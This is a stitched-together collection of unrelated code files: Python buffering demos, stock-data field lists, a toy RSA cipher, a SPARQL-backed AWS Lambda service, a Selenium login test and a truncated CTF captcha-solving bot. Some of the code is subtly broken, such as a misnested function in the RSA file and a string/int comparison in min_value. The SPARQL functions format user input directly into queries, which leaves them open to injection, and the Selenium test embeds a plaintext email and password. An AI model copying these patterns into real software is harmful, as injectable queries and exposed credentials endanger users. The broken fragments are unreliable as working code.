f.write("python中缓冲区的处理")
f.close() #调用close方法,文件缓冲区清空,内容写到文件中,关闭文件
#-------------------------------------------------------------------
f2 = open("D:/test/缓冲区处理.txt","w+")
f2.write("第二次操作缓冲区处理.txt文件,之后我要进行flush操作,然后再写入一句话\n")
f2.flush() #执行完flush操作去查看文件,文件内容已经写入,此时缓冲区还是有内容
time.sleep(1) #让程序暂停十秒,以便去插卡flush操作之后文件内容是否已经写入
f2.write("第一次查看文件是,没有这句话,close操作之后才有")
f2.close()
#--------------------------------------------------------------------
f3 = open("D:/test/缓冲区处理.txt","w+")
f3.write("helloworld!!!\n")
f3.write("helloworld!!!\n")
f3.write("helloworld!!!\n")
f3.write("helloworld!!!\n") #写操作写完后,指针位置在文件结尾
f3.flush() #将内容写入文件
f3.seek(0)
#read操作是从指针开始位置读取文件内容,如果没有将指针位置重新指向文件开头,则读取不到文件内容
print(f3.read())
f3.close()
|
a=int(input('digite u numero: '))
print(f'o antecessor de {a} é {a-1}')
print(f'e o sucessor é {a+1}') |
#!/usr/bin/python3
# Script that fetches an URL
import urllib.request
print("Body response:")
with urllib.request.urlopen('https://intranet.hbtn.io/status') as response:
body = response.read()
print("\t- type: {}".format(type(response.read())))
print("\t- content: {}".format(body))
print("\t- utf8 content: {}".format(body.decode('utf-8')))
response.close()
|
class XcomError(Exception):
def __init__(self, message = '', thrower = None):
super().__init__(message)
self.thrower = thrower
class ParseError(XcomError):
pass
class ResponseError(XcomError):
pass
class StatusError(XcomError):
pass
class ClientTimeoutError(XcomError):
pass
class CommunicationError(XcomError):
pass
class EndOfConfig(XcomError):
pass |
col_list = [
'symbol',
'zip',
'sector',
'fullTimeEmployees',
'longBusinessSummary',
'city',
'phone',
'state',
'country',
'companyOfficers',
'website',
'maxAge',
'address1',
'fax',
'industry',
'address2',
'ebitdaMargins',
'profitMargins',
'grossMargins',
'operatingCashflow',
'revenueGrowth',
'operatingMargins',
'ebitda',
'targetLowPrice',
'recommendationKey',
'grossProfits',
'freeCashflow',
'targetMedianPrice',
'currentPrice',
'earningsGrowth',
'currentRatio',
'returnOnAssets',
'numberOfAnalystOpinions',
'targetMeanPrice',
'debtToEquity',
'returnOnEquity',
'targetHighPrice',
'totalCash',
'totalDebt',
'totalRevenue',
'totalCashPerShare',
'financialCurrency',
'revenuePerShare',
'quickRatio',
'recommendationMean',
'exchange',
'shortName',
'longName',
'exchangeTimezoneName',
'exchangeTimezoneShortName',
'isEsgPopulated',
'gmtOffSetMilliseconds',
'underlyingSymbol',
'quoteType',
'underlyingExchangeSymbol',
'headSymbol',
'messageBoardId',
'uuid',
'market',
'annualHoldingsTurnover',
'enterpriseToRevenue',
'beta3Year',
'enterpriseToEbitda',
'52WeekChange',
'morningStarRiskRating',
'forwardEps',
'revenueQuarterlyGrowth',
'sharesOutstanding',
'fundInceptionDate',
'annualReportExpenseRatio',
'totalAssets',
'bookValue',
'sharesShort',
'sharesPercentSharesOut',
'fundFamily',
'lastFiscalYearEnd',
'heldPercentInstitutions',
'netIncomeToCommon',
'trailingEps',
'lastDividendValue',
'SandP52WeekChange',
'priceToBook',
'heldPercentInsiders',
'nextFiscalYearEnd',
'yield',
'mostRecentQuarter',
'shortRatio',
'sharesShortPreviousMonthDate',
'floatShares',
'beta',
'enterpriseValue',
'priceHint',
'threeYearAverageReturn',
'lastSplitDate',
'lastSplitFactor',
'legalType',
'morningStarOverallRating',
'earningsQuarterlyGrowth',
'priceToSalesTrailing12Months',
'dateShortInterest',
'pegRatio',
'ytdReturn',
'forwardPE',
'lastCapGain',
'shortPercentOfFloat',
'sharesShortPriorMonth',
'category',
'fiveYearAverageReturn',
'previousClose',
'regularMarketOpen',
'twoHundredDayAverage',
'trailingAnnualDividendYield',
'payoutRatio',
'volume24Hr',
'regularMarketDayHigh',
'navPrice',
'averageDailyVolume10Day',
'regularMarketPreviousClose',
'fiftyDayAverage',
'trailingAnnualDividendRate',
'open',
'averageVolume10days',
'expireDate',
'algorithm',
'dividendRate',
'exDividendDate',
'circulatingSupply',
'startDate',
'regularMarketDayLow',
'currency',
'trailingPE',
'regularMarketVolume',
'lastMarket',
'maxSupply',
'openInterest',
'marketCap',
'volumeAllCurrencies',
'strikePrice',
'averageVolume',
'dayLow',
'ask',
'askSize',
'volume',
'fiftyTwoWeekHigh',
'fromCurrency',
'fiveYearAvgDividendYield',
'fiftyTwoWeekLow',
'bid',
'tradeable',
'dividendYield',
'bidSize',
'dayHigh',
'regularMarketPrice',
'logo_url',
'quoteSourceName',
'averageDailyVolume3Month',
'regularMarketTime',
'regularMarketChange',
'preMarketPrice',
'exchangeDataDelayedBy',
'postMarketChange',
'postMarketPrice',
'exchangeName',
'preMarketChange',
'regularMarketSource',
'marketState',
]
scan_col_list = [
'symbol',
'sector',
'industry',
# 'ebitdaMargins',
# 'profitMargins',
# 'grossMargins',
# 'operatingCashflow',
# 'revenueGrowth',
# 'operatingMargins',
# 'ebitda',
# 'targetLowPrice',
# 'recommendationKey',
# 'grossProfits',
# 'freeCashflow',
# 'targetMedianPrice',
# 'currentPrice',
# 'earningsGrowth',
# 'currentRatio',
# 'returnOnAssets',
# 'numberOfAnalystOpinions',
# 'targetMeanPrice',
# 'debtToEquity',
# 'returnOnEquity',
# 'targetHighPrice',
# 'totalCash',
# 'totalDebt',
# 'totalRevenue',
# 'totalCashPerShare',
# 'financialCurrency',
# 'revenuePerShare',
# 'quickRatio',
# 'recommendationMean',
# 'shortName',
# 'longName',
# 'isEsgPopulated',
# 'market',
# 'annualHoldingsTurnover',
# 'enterpriseToRevenue',
# 'beta3Year',
# 'enterpriseToEbitda',
# '52WeekChange',
# 'morningStarRiskRating',
# 'forwardEps',
# 'revenueQuarterlyGrowth',
# 'sharesOutstanding',
# 'annualReportExpenseRatio',
# 'totalAssets',
# 'bookValue',
# 'sharesShort',
# 'sharesPercentSharesOut',
# 'fundFamily',
# 'heldPercentInstitutions',
# 'netIncomeToCommon',
# 'trailingEps',
# 'lastDividendValue',
# 'SandP52WeekChange',
# 'priceToBook',
# 'heldPercentInsiders',
# 'yield',
# 'shortRatio',
# 'sharesShortPreviousMonthDate',
# 'floatShares',
# 'beta',
# 'enterpriseValue',
# 'priceHint',
# 'threeYearAverageReturn',
# 'lastSplitDate',
# 'lastSplitFactor',
# 'legalType',
# 'morningStarOverallRating',
# 'earningsQuarterlyGrowth',
# 'priceToSalesTrailing12Months',
# 'dateShortInterest',
# 'pegRatio',
# 'ytdReturn',
# 'forwardPE',
# 'lastCapGain',
# 'shortPercentOfFloat',
# 'sharesShortPriorMonth',
# 'category',
# 'fiveYearAverageReturn',
# 'previousClose',
# 'regularMarketOpen',
# 'twoHundredDayAverage',
# 'trailingAnnualDividendYield',
# 'payoutRatio',
# 'volume24Hr',
# 'regularMarketDayHigh',
# 'navPrice',
# 'averageDailyVolume10Day',
# 'regularMarketPreviousClose',
# 'fiftyDayAverage',
# 'trailingAnnualDividendRate',
# 'open',
# 'averageVolume10days',
# 'expireDate',
# 'algorithm',
# 'dividendRate',
# 'exDividendDate',
# 'circulatingSupply',
# 'startDate',
# 'regularMarketDayLow',
# 'trailingPE',
# 'regularMarketVolume',
# 'lastMarket',
# 'maxSupply',
# 'openInterest',
# 'marketCap',
# 'volumeAllCurrencies',
# 'strikePrice',
# 'averageVolume',
# 'dayLow',
# 'ask',
# 'askSize',
# 'volume',
# 'fiftyTwoWeekHigh',
# 'fromCurrency',
# 'fiveYearAvgDividendYield',
# 'fiftyTwoWeekLow',
# 'bid',
'tradeable',
# 'dividendYield',
# 'bidSize',
# 'dayHigh',
# 'regularMarketPrice',
# 'quoteSourceName',
# 'averageDailyVolume3Month',
# 'regularMarketTime',
# 'regularMarketChange',
# 'preMarketPrice',
# 'exchangeDataDelayedBy',
# 'postMarketChange',
# 'postMarketPrice',
# 'exchangeName',
# 'preMarketChange',
# 'regularMarketSource',
# 'marketState',
]
scan_col_list_2 = [
'symbol',
# 'zip',
'sector',
# 'fullTimeEmployees',
# 'longBusinessSummary',
# 'city',
# 'phone',
# 'state',
# 'country',
# 'companyOfficers',
# 'website',
# 'maxAge',
# 'address1',
# 'fax',
'industry',
# 'address2',
'ebitdaMargins',
'profitMargins',
'grossMargins',
'operatingCashflow',
'revenueGrowth',
'operatingMargins',
'ebitda',
'targetLowPrice',
'recommendationKey',
'grossProfits',
'freeCashflow',
'targetMedianPrice',
'currentPrice',
'earningsGrowth',
'currentRatio',
'returnOnAssets',
'numberOfAnalystOpinions',
'targetMeanPrice',
'debtToEquity',
'returnOnEquity',
'targetHighPrice',
'totalCash',
'totalDebt',
'totalRevenue',
'totalCashPerShare',
'financialCurrency',
'revenuePerShare',
'quickRatio',
'recommendationMean',
# 'exchange',
'shortName',
'longName',
# 'exchangeTimezoneName',
# 'exchangeTimezoneShortName',
'isEsgPopulated',
# 'gmtOffSetMilliseconds',
# 'underlyingSymbol',
# 'quoteType',
# 'underlyingExchangeSymbol',
# 'headSymbol',
# 'messageBoardId',
# 'uuid',
'market',
'annualHoldingsTurnover',
'enterpriseToRevenue',
'beta3Year',
'enterpriseToEbitda',
'52WeekChange',
'morningStarRiskRating',
'forwardEps',
'revenueQuarterlyGrowth',
'sharesOutstanding',
# 'fundInceptionDate',
'annualReportExpenseRatio',
'totalAssets',
'bookValue',
'sharesShort',
'sharesPercentSharesOut',
'fundFamily',
# 'lastFiscalYearEnd',
'heldPercentInstitutions',
'netIncomeToCommon',
'trailingEps',
'lastDividendValue',
'SandP52WeekChange',
'priceToBook',
'heldPercentInsiders',
# 'nextFiscalYearEnd',
'yield',
# 'mostRecentQuarter',
'shortRatio',
'sharesShortPreviousMonthDate',
'floatShares',
'beta',
'enterpriseValue',
'priceHint',
'threeYearAverageReturn',
'lastSplitDate',
'lastSplitFactor',
'legalType',
'morningStarOverallRating',
'earningsQuarterlyGrowth',
'priceToSalesTrailing12Months',
'dateShortInterest',
'pegRatio',
'ytdReturn',
'forwardPE',
'lastCapGain',
'shortPercentOfFloat',
'sharesShortPriorMonth',
'category',
'fiveYearAverageReturn',
'previousClose',
'regularMarketOpen',
'twoHundredDayAverage',
'trailingAnnualDividendYield',
'payoutRatio',
'volume24Hr',
'regularMarketDayHigh',
'navPrice',
'averageDailyVolume10Day',
'regularMarketPreviousClose',
'fiftyDayAverage',
'trailingAnnualDividendRate',
'open',
'averageVolume10days',
'expireDate',
'algorithm',
'dividendRate',
'exDividendDate',
'circulatingSupply',
'startDate',
'regularMarketDayLow',
# 'currency',
'trailingPE',
'regularMarketVolume',
'lastMarket',
'maxSupply',
'openInterest',
'marketCap',
'volumeAllCurrencies',
'strikePrice',
'averageVolume',
'dayLow',
'ask',
'askSize',
'volume',
'fiftyTwoWeekHigh',
'fromCurrency',
'fiveYearAvgDividendYield',
'fiftyTwoWeekLow',
'bid',
'tradeable',
'dividendYield',
'bidSize',
'dayHigh',
'regularMarketPrice',
# 'logo_url',
'quoteSourceName',
'averageDailyVolume3Month',
'regularMarketTime',
'regularMarketChange',
'preMarketPrice',
'exchangeDataDelayedBy',
'postMarketChange',
'postMarketPrice',
'exchangeName',
'preMarketChange',
'regularMarketSource',
'marketState',
]
|
import random
from random import randint
from decimal import *
abecedario = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"]
tam = 26;
def exponente(y,b,mod):
x = 1
while (b > 1):
if( b%2 == 0):
#print (str(y)+" | "+str(b)+ " | "+str(x))
y = (y ** 2)%mod
b = b/2
#print("es par")
if(b%2 == 1):
#print (str(y)+" | "+str(b)+ " | "+str(x))
b -= 1
x = (x * y)%mod
#print("es impar")
return x
def in_p():
w = input("------Introduzca p: ")
def encontrar_indice(a):
for i in range (0,tam):
if abecedario[i] == a:
return i;
return int(w)
def in_cadena():
w = input("------Introduzca cadena: ")
return w
def in_q():
w = input("------Introduzca q: ")
return int(w)
def mcd (m, n):
if m % n == 0:
return n;
else:
return mcd(n, m%n);
#SON COPRIMOS SI EL MCD es 1
def primo(n):
a=0
for i in range(1,n+1):
if(n % i==0):
a=a+1;
if a!=2:
return 0;
else:
return 1; #pasa
def lehman(n,l):
comp = 0;
b = [];
for it in range(1,l):
#print(n-1)
a = random.randint(1, (n-1));
#print(a);
c = exponente(a,(n-1)/2,n);
if (c != 1) and (c != n-1):
return 1;
else:
b.insert(it, c);
#print (b);
#print(len(b));
for it in range(1,len(b)):
#print(it);
if(b[int(it)] != 1):
#print("Hay alguno que no es igual a 1")
comp = 1;
if comp == 1:
return 0;
else:
return 1;
def ecluides(a,b):
while b!=0:
t = b;
b = a % b;
a = t;
return a;
def calcular_j(base,n):
count = 0;
while (base ** count) < n:
count = count +1
return count -1;
def calcular_bloques(vector_cadena,j, base):
count = 0;
vector_res = [];
i = 0;
#print(len(vector_cadena));
while (i < len(vector_cadena)-1):
resultado = 0;
aux = j-1
#print("BLOQUE------------------------")
while (aux >= 0):
#print(str(vector_cadena[i])+" * ("+str(base)+" ** "+str(aux));
resultado += vector_cadena[i] * (base ** aux);
#print (resultado);
aux -= 1;
i += 1;
#print(resultado);
vector_res += [resultado];
return vector_res;
def cifrar(vector,e,n):
c = [];
for i in range (0,len(vector)):
#print("e"+e);
c += [(vector[i]**e)%n]
return c;
def inver(a,n):
t = 0;
newt = 1;
r = n;
newr = a;
while newr != 0:
quotient = int(r / newr);
t, newt = newt, t - quotient * newt
r, newr = newr, r - quotient * newr
if r > 1:
return "a is not invertible";
if t < 0:
t = t+n;
return t;
def RSA(p,q,d):
if(lehman(p,35) != 0):
print("p");
return -1;
if(lehman(q,35) != 0):
print("q");
return -1;
On = (p-1)*(q-1);
n = p*q
if(ecluides(d,On) != 1):
print("ecluides");
return -1;
cadena = in_cadena();
vector_cadena = [];
for i in range (0,len(cadena)):
if(cadena[i] != " "):
vector_cadena += [encontrar_indice(cadena[i].lower())];
vector_bloques = calcular_bloques(vector_cadena,calcular_j(tam,n),tam);
e = inver(d,On);
#print(e);
vector_cifrado = []
vector_cifrado = cifrar(vector_bloques,e,n);
print(vector_cifrado);
#RSA(421,7,1619);
#RSA(421,7,1619);
#print(mcd(4,5));
#print(inver(1619,2520))
#calcular_j(26,2947);
#print(calcular_bloques([12,0,12,0,12,0],2,26));
|
lod = [{'tanah': '70', 'bangunan': '50', 'jarak_ke_pusat': '15', 'harga': '500'}, {'tanah': '70', 'bangunan': '60', 'jarak_ke_pusat': '30', 'harga': '400'}, {'tanah': '70', 'bangunan': '60', 'jarak_ke_pusat': '55', 'harga': '300'}, {'tanah': '100', 'bangunan': '50', 'jarak_ke_pusat': '30', 'harga': '700'}, {'tanah': '100', 'bangunan': '70', 'jarak_ke_pusat': '25', 'harga': '1000'}, {'tanah': '100', 'bangunan': '70', 'jarak_ke_pusat': '50', 'harga': '650'}, {'tanah': '120', 'bangunan': '100', 'jarak_ke_pusat': '20', 'harga': '2000'}, {'tanah': '120', 'bangunan': '80', 'jarak_ke_pusat': '50', 'harga': '1200'}, {'tanah': '150', 'bangunan': '100', 'jarak_ke_pusat': '50', 'harga': '1800'}, {'tanah': '150', 'bangunan': '90', 'jarak_ke_pusat': '15', 'harga': '3000'}]
def min_value(list_attributes):
min_attribute = 9999
for attr in list_attributes :
if int(attr) < min_attribute:
min_attribute = attr
return min_attribute
d = min_value(['70', '70', '70', '100', '100', '100', '120', '120', '150', '150'])
print(d)
|
import json
import uuid
import hashlib
from SPARQLWrapper import SPARQLWrapper, JSON, CSV
from collections import Counter
def get_preferences():
db_labels = get_db_labels(reversed=True)
fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/")
query = """
PREFIX users: <http://www.semanticweb.org/ontologies/users#>
PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT ?db ?user_id ?views
WHERE {
?db rdf:type preferences:Preference .
optional {
?db preferences:views_count ?views .
}
optional {
?db preferences:users ?user .
?user users:user_id ?user_id .
}
}
"""
fuseki_client.setQuery(query)
fuseki_client.method = "POST"
fuseki_client.setReturnFormat(CSV)
results = fuseki_client.query().convert()
prefs = {}
for line in results.decode('utf-8').strip().split('\r\n')[1:]:
label, uid, views = line.split(',')
label = label.rsplit('#', 1)[-1]
label = db_labels[label]
if label not in prefs:
prefs[label] = {
'views': views,
'user_ids': []
}
if len(uid) > 0:
prefs[label]['user_ids'].append(uid)
return prefs
def get_db_labels(reversed=False):
fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/dbs/")
query = """
PREFIX : <http://www.semanticweb.org/ontologies/databases/tbox/>
PREFIX users: <http://www.semanticweb.org/ontologies/users#>
PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT * WHERE {
?x a :DatabaseManagementSystem ;
rdfs:label ?label
}
"""
fuseki_client.setQuery(query)
fuseki_client.method = "POST"
fuseki_client.setReturnFormat(CSV)
results = fuseki_client.query().convert()
prefs = {}
for line in results.decode('utf-8').strip().split('\r\n')[1:]:
tag, label = line.split(',')
if reversed:
prefs[tag.rsplit('/', 1)[-1]] = label
else:
prefs[label] = tag.rsplit('/', 1)[-1]
return prefs
def insert_preference(label, views_count=0):
supported_dbs = get_db_labels()
pref = get_preference(label)
if label not in supported_dbs or pref is not None:
return False
fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/update")
query = """
PREFIX : <http://www.semanticweb.org/ontologies/databases/tbox/>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX users: <http://www.semanticweb.org/ontologies/users#>
PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
INSERT DATA {
preferences:%s rdf:type preferences:Preference ;
preferences:database_id :%s ;
preferences:views_count %d
}
""" % (supported_dbs[label], supported_dbs[label], views_count)
fuseki_client.setQuery(query)
fuseki_client.queryType = "INSERT"
fuseki_client.method = "POST"
fuseki_client.query()
return True
def delete_preference(label):
db_labels = get_db_labels()
if label not in db_labels:
return False
fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/update")
query = """
PREFIX users: <http://www.semanticweb.org/ontologies/users#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
DELETE WHERE {
preferences:%s a preferences:Preference ;
?property ?value
}
""" % db_labels[label]
fuseki_client.setQuery(query)
fuseki_client.queryType = "DELETE"
fuseki_client.method = "POST"
fuseki_client.query()
return True
def get_preference(label):
db_labels = get_db_labels()
if label not in db_labels:
return None
fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/")
query = """
PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX users: <http://www.semanticweb.org/ontologies/users#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
SELECT ?ctr ?val
WHERE {
preferences:%s a preferences:Preference .
optional {
preferences:%s preferences:views_count ?ctr .
}
optional {
preferences:%s preferences:users ?user .
?user users:user_id ?val
}
}
""" % (db_labels[label], db_labels[label], db_labels[label])
fuseki_client.setQuery(query)
fuseki_client.method = "POST"
fuseki_client.setReturnFormat(CSV)
results = fuseki_client.query().convert()
pref = {}
for idx, line in enumerate(results.decode('utf-8').strip().split('\r\n')[1:]):
views_count, user = line.split(',')
if idx == 0:
pref['views_count'] = views_count
pref['user_ids'] = [user] if len(user) > 0 else []
else:
pref['user_ids'].append(user)
if len(pref) == 0:
return None
return pref
def add_user_preference(preference_label, user_id):
db_label = get_db_labels()
insert_preference(preference_label)
fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/update")
query = """
PREFIX users: <http://www.semanticweb.org/ontologies/users#>
PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
INSERT {
preferences:%s preferences:users ?s .
}
WHERE {
?s rdf:type users:User .
?s users:user_id "%s" .
}
""" % (db_label[preference_label], user_id)
fuseki_client.setQuery(query)
fuseki_client.queryType = "INSERT"
fuseki_client.method = "POST"
fuseki_client.query()
return True
def remove_user_preference(preference_label, user_id):
db_labels = get_db_labels()
if preference_label not in db_labels:
return False
fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/update")
query = """
PREFIX users: <http://www.semanticweb.org/ontologies/users#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
DELETE {
preferences:%s preferences:users ?x
}
WHERE {
?x users:user_id "%s"
}
""" % (db_labels[preference_label], user_id)
fuseki_client.setQuery(query)
fuseki_client.queryType = "DELETE"
fuseki_client.method = "POST"
fuseki_client.query()
return True
def update_preference(label, views_count):
db_labels = get_db_labels()
if label not in db_labels:
return False
fuseki_client = SPARQLWrapper("http://ec2-54-93-236-36.eu-central-1.compute.amazonaws.com:3030/v2/")
query = """
PREFIX users: <http://www.semanticweb.org/ontologies/users#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
DELETE WHERE {
preferences:%s preferences:views_count ?x
}
""" % db_labels[label]
fuseki_client.setQuery(query)
fuseki_client.queryType = "DELETE"
fuseki_client.method = "POST"
fuseki_client.query()
query = """
PREFIX users: <http://www.semanticweb.org/ontologies/users#>
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX preferences: <http://www.semanticweb.org/milut/ontologies/preferences#>
INSERT DATA {
preferences:%s preferences:views_count %d
}
""" % (db_labels[label], views_count)
fuseki_client.setQuery(query)
fuseki_client.queryType = "INSERT"
fuseki_client.method = "POST"
fuseki_client.query()
return True
def tests():
pass
# print(get_db_labels().keys())
# print(get_preferences())
# print(delete_preference("Cassandra"))
# print(delete_preference("Neo4j"))
# print(delete_preference("Redis"))
# print(delete_preference("MongoDB"))
# print(delete_preference("HBase"))
# print(get_preference('Redis'))
# print(insert_preference('HBase', 12))
# print(add_user_preference('ZeroDB', 'bd576b0f-7f91-40d3-93ce-9ec202d38a3c'))
# print(remove_user_preference('Oracle', '38325f1f-3176-40b0-a3bf-2b653c9f3c8d'))
# print(update_preference('Redis', 25))
def lambda_handler(event, context):
http_method = event.get('httpMethod')
# get preferences or preference
if http_method == 'GET':
label = event.get('queryStringParameters').get('label', None)
if label is None:
response = get_preferences()
else:
response = get_preference(label)
return {
"statusCode": 200,
"headers": {"Access-Control-Allow-Origin": "*"},
"body": json.dumps(response)
}
# add user preference
if http_method == 'POST':
body = json.loads(event.get('body'))
response = add_user_preference(body['label'], body['user_id'])
return {
"statusCode": 200,
"headers": {"Access-Control-Allow-Origin": "*"},
"body": json.dumps(response)
}
# update views count
if http_method == 'PUT':
new_data = json.loads(event.get('body'))
response = update_preference(new_data['label'], new_data['views_count'])
return {
"statusCode": 200,
"headers": {"Access-Control-Allow-Origin": "*"},
"body": json.dumps(response)
}
# delete preference
if http_method == 'DELETE':
new_data = json.loads(event.get('body'))
response = delete_preference(new_data['label'])
return {
"statusCode": 200,
"headers": {"Access-Control-Allow-Origin": "*"},
"body": response
}
return {
"statusCode": 400,
"headers": {"Access-Control-Allow-Origin": "*"},
"body": "No matched method"
}
|
from selenium import webdriver
import unittest
import time
from selenium.webdriver.common.keys import Keys
class TestCaseTaoKipThi(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.driver = webdriver.Chrome(executable_path="D:\pythonProject\driver\chromedriver.exe")
cls.driver.implicitly_wait(10)
cls.driver.maximize_window()
def test_1_OpenWeb(self):
driver = self.driver
driver.get("https://a.khaothi.online/login") # openwweb
driver.set_page_load_timeout(20)
time.sleep(0.3)
def test_2_Login(self):
driver = self.driver
driver.find_element_by_xpath("//*[@id='basic_email']").click()
driver.find_element_by_xpath("//*[@id='basic_email']").send_keys("fis@xcbt.online")
driver.find_element_by_xpath("//*[@id='basic_password']").click()
driver.find_element_by_xpath("//*[@id='basic_password']").send_keys("Abc@123")
driver.find_element_by_xpath("//*[@id='basic']/div[3]/div/div/div/button").click()
time.sleep(0.5)
driver.find_element_by_xpath("//span[contains(.,'Phiên bản trường')]").click()
def test_3_Danhsachkipthi(self):
driver = self.driver
time.sleep(0.5)
driver.find_element_by_xpath("//li[6]/div").click()
# lỗi cần sửa vì lúc nào cũng bị nhảy menu
driver.find_element_by_xpath("//a[contains(text(),'Danh sách kíp thi')]").click()
a = driver.find_element_by_xpath("//*[@id='root']/section/section/main/div[2]/div/div/div/div/h3").text
print(a)
def test_4_TaoKipThi(self):
driver = self.driver
driver.find_element_by_xpath("//*[@id='root']/section/section/main/div[2]/div/div/div/div/h3/a").click()
driver.find_element_by_xpath("//*[@id='text-input']").click()
driver.find_element_by_xpath("//*[@id='text-input']").send_keys("python auto test")
driver.find_element_by_xpath("//div[@id='react-select-2--value']/div").click()
time.sleep(0.3)
driver.find_element_by_xpath("//div[@id='react-select-2--value']/div/input").send_keys("FFDQHU - Gói đề test -Auto - vui lòng không sử dụng")
driver.find_element_by_xpath("//div[@id='react-select-2--value']/div/input").send_keys(Keys.ENTER)
driver.find_element_by_xpath("//div[@id='react-select-3--value']/div").click()
time.sleep(0.3)
driver.find_element_by_xpath("//div[@id='react-select-3--value']/div/input").send_keys("Lớp test _auto_Vui long không sử dụng")
driver.find_element_by_xpath("//div[@id='react-select-3--value']/div/input").send_keys(Keys.ENTER)
driver.find_element_by_xpath("//*[@id='root']/section/section/main/div[2]/div/div/div/div/form/div[8]/div[2]").click()
time.sleep(0.5)
driver.find_element_by_xpath("//div[@id='root']/section/section/main/div[2]/div/div/div/div/form/div[8]/div[2]/textarea").send_keys("testok")
# thời gian hoạt động của kíp thi không cần chỉnh sửa vì tự động điền thông tin
driver.find_element_by_name("time_limit").click()
driver.find_element_by_name("time_limit").clear()
driver.find_element_by_name("time_limit").send_keys("60")
driver.execute_script("window.scrollTo(0,document.body.scrollHeight)")
driver.find_element_by_xpath("/html/body/div[2]/section/section/main/div[2]/div/div/div/div/form/div[19]/div/button").click()
@classmethod
def tearDownClass(cls):
# cls.driver.close()
# cls.driver.quit()
print("Complete") |
import requests
from lxml import etree
from io import StringIO
import base64
import codecs
from keras.models import load_model
from helpers import resize_to_fit
from imutils import paths
import numpy as np
import imutils
import cv2
import pickle
import os
import glob
import time
try:
import Image
except ImportError:
from PIL import Image
from subprocess import check_output
import Solver
LETTER_MODEL_FILENAME = "captcha_model.hdf5"
LETTER_MODEL_LABELS_FILENAME = "model_labels.dat"
# folder to temporaliy save images
TEMP_CAPTCHA = "TEMP"
URL = "http://hax1.allesctf.net:9200/captcha/"
# init parser
parser = etree.HTMLParser()
# load labels for model
with open(LETTER_MODEL_LABELS_FILENAME, "rb") as f:
LETTER_MODEL_LABELS = pickle.load(f)
# load the model
LETTER_MODEL = load_model(LETTER_MODEL_FILENAME)
# function to clear all temporaliy stored captchas
def clearFiles():
files = glob.glob(TEMP_CAPTCHA + "/*")
for f in files:
os.remove(f)
# parse the html, decode base-64 images and then save them
def extractCaptchas(html):
# turn into tree using html parser as spezifed above
tree = etree.parse(StringIO(html), parser=parser)
root = tree.getroot()
try:
# part of the DOM hirachy the contains the captchas
captchas = root[1][1][1][1][1]
except IndexError:
return False
# get all images and ecode and save
# because ever captcha has a button below it only every second element is a image
print("found " + str((len(captchas) - 1) // 2) + " captchas")
for i in range(0, len(captchas) - 1, 2):
img = captchas[i][0].attrib['src'][22:]
# files name: 0-<num captchas>
fileName = TEMP_CAPTCHA + "/{}.png".format(i//2)
fh = open(fileName, "wb")
imgData = img.encode('ASCII')
fh.write(codecs.decode(imgData, encoding='base64'))
fh.close()
return True
# send the asnwers for a spezific stage with a session and store new captchas
def sendAnswers(session, stage, answers):
print("seding answers")
for key in answers:
print(key + " : " + answers[key])
# send as post requests with our answers
response = session.post(URL+ str(stage), data=answers)
# if we completed the last stage(3) save the flag and exit
if not("fail" in response.url) and stage == 3:
f = open("flag.html", "w")
f.write(response.content.decode("utf-8"))
f.close()
print("flag found!!!")
os._exit(0)
# extract the images from the response
return extractCaptchas(response.content.decode("utf-8"))
# use Solver.py to get the answers for every image in the temp folder and return a dict for a post requests
def getAllAnswers():
# dict to hold all answers
answers = {}
# iterate over every file in temp folder
for image_file in list(paths.list_images(TEMP_CAPTCHA)):
filename = os.path.basename(image_file)
# get answer as string from cv2 image
image = cv2.imread(image_file)
answer = Solver.solve(image)
# save the answer as the filename
answers[filename[:-4]] = answer
return answers
# loop and solve captchas untill we got the flag
def main():
# create temp folder if it doesn't exist
